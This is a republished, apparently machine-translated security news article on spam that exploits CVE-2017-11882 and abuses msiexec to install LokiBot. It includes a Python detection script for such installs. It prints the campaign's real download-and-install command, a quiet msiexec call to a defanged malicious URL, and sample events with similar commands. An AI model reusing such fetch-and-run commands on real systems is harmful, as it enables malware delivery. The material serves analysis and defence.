2025-01-16 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
Many newcomers are not clear about what Windows Installer is used for. To help answer that question, this article explains it in detail; I hope those who need it will gain something from it.
Recently, we found that attackers have begun exploiting CVE-2017-11882 with an unusual delivery method: the Windows Installer service (msiexec.exe) built into Microsoft Windows. This differs from earlier malware exploiting the same vulnerability, which used mshta.exe to download and execute payloads and to run PowerShell scripts.
Infection chain
The following figure shows the infection chain of this attack technique:
The sample we analyzed appears to have come from a spam campaign. The email asks the recipient to confirm a bill payment and then tries to "scare" them. It was written in Korean and translates roughly to: "Hello, your computer may have been infected with a virus or malware, please check it." The email carried an attachment named "Payment copy.Doc" (detected by Trend Micro as TROJ_CVE2017-11882.SM), which contained the exploit code for CVE-2017-11882.
The email content is shown below:
When the user opens the Word document, they will see something like this:
After successfully exploiting the vulnerability, the attacker downloads and installs a malicious MSI package named zus.msi through Windows Installer by running the following command:
cmd.exe /c msiexec /q /I "hxxps://www[.]uwaoma[.]info/zus.msi"
Msiexec downloads and installs a file called MSIFD83.tmp:
The installed MSIL code is as follows:
After the download, Windows Installer (msiexec.exe) installs a piece of MSIL or Delphi code on the system, which serves as the loader for the actual payload. Note that the malicious packages also use a compression layer, so file scanning engines must unpack and enumerate the layers to detect the malicious content. Even then, the real payload is hard to identify because the MSIL or Delphi code is heavily obfuscated.
When run, the loader drops a randomly named copy of the malware payload.
So far, we've found that attackers use this technique primarily to propagate LokiBot (TROJ_LOKI.SMA), but based on our analysis of its modules, it can also be used to propagate other payloads.
Below is a sample of the LokiBot variants we identified:
Why would an attacker need a new way to install a malicious payload?
Security products have become increasingly effective at detecting and monitoring programs such as Wscript, PowerShell, mshta.exe and Winword.exe that attackers commonly use to install malicious payloads. Because these methods are already widespread in cybercrime, their chance of being detected has risen accordingly. Using msiexec.exe to download a malicious MSI package, however, is not a method most malware uses.
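Process-creation telemetry is where this delivery method stands out: a document handler spawning msiexec with a quiet switch and a package argument that is a URL, as in the command line shown above. The following detection logic is an added example written for this article (not code from the original report); the event tuples and domains are constructed, and the parent-process names are assumptions about what such telemetry typically records.

```python
import re
from typing import Optional

# Constructed sample process-creation events (parent image, child image,
# command line); illustrative only, not telemetry from the report.
SAMPLE_EVENTS = [
    ("EQNEDT32.EXE", "cmd.exe",
     'cmd.exe /c msiexec /q /I "https://www.example.invalid/zus.msi"'),
    ("WINWORD.EXE", "msiexec.exe",
     "msiexec -quiet -package http://cdn.example.invalid/pkg.msi"),
    ("explorer.exe", "msiexec.exe", 'msiexec.exe /i "C:\\Temp\\setup.msi" /qn'),
    ("services.exe", "msiexec.exe", "msiexec.exe /V"),
]

INSTALL_SWITCHES = {"/i", "/package", "/a", "/p", "/update"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
URL_RE = re.compile(r"^(?:https?|ftp)://\S+", re.IGNORECASE)


def _tokens(cmdline: str) -> list:
    """Split a Windows command line, honouring double quotes and dropping them."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyze(parent: str, image: str, cmdline: str) -> Optional[dict]:
    """Return a finding when msiexec installs a package fetched from a URL.

    None means msiexec is absent or the package is a local file. Office
    parents raise severity, since the CVE-2017-11882 chain launches from one.
    """
    toks = _tokens(cmdline)
    # The chain wraps msiexec in "cmd.exe /c ...", so find msiexec anywhere on the line.
    start = next((i for i, t in enumerate(toks)
                  if t.lower().rsplit("\\", 1)[-1] in ("msiexec", "msiexec.exe")), None)
    if start is None:
        return None
    url, quiet = None, False
    args = toks[start + 1:]
    for i, tok in enumerate(args):
        if tok[:1] not in ("/", "-"):
            continue
        sw = "/" + tok[1:].lower()  # msiexec accepts both / and - prefixes
        if sw.startswith("/q") or sw == "/passive":
            quiet = True  # UI suppressed: /q, /qn, /qb, /quiet, /passive
        elif sw in INSTALL_SWITCHES and i + 1 < len(args) and URL_RE.match(args[i + 1]):
            url = args[i + 1]
    if url is None:
        return None
    office = parent.lower() in OFFICE_PARENTS
    return {"url": url, "quiet": quiet, "office_parent": office,
            "severity": "high" if office else "medium"}
```

Run `analyze` over each event in your own process-creation feed; a local-path install from explorer.exe (the third sample) produces no finding, while either remote-URL sample is flagged high because of its Office parent.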
Although the Andromeda botnet (ANDROM malware family) also uses msiexec.exe, it uses the installer differently from LokiBot: Andromeda injects malicious code into msiexec.exe to download its payload, and then downloads, executes and updates a PE file directly. The LokiBot method instead requires an MSI package that msiexec.exe recognizes as installable, so it goes through Windows Installer itself.
In fact, malware does not have to install itself through an MSI package. Unlike most malware that abuses msiexec.exe, the sample we analyzed required no code injection or modification: it simply used Windows Installer, as designed, to install the malware.
We therefore believe the main reason for choosing this unusual installation method is that the malware developers were looking for a new way to bypass security detection.
Mitigation
Since the attack begins with a phishing email, users can limit its impact by defending against phishing. In addition, users should read the wording of any email carefully and treat grammatical errors or other oddities as a warning sign.
© 2024 shulou.com SLNews company. All rights reserved.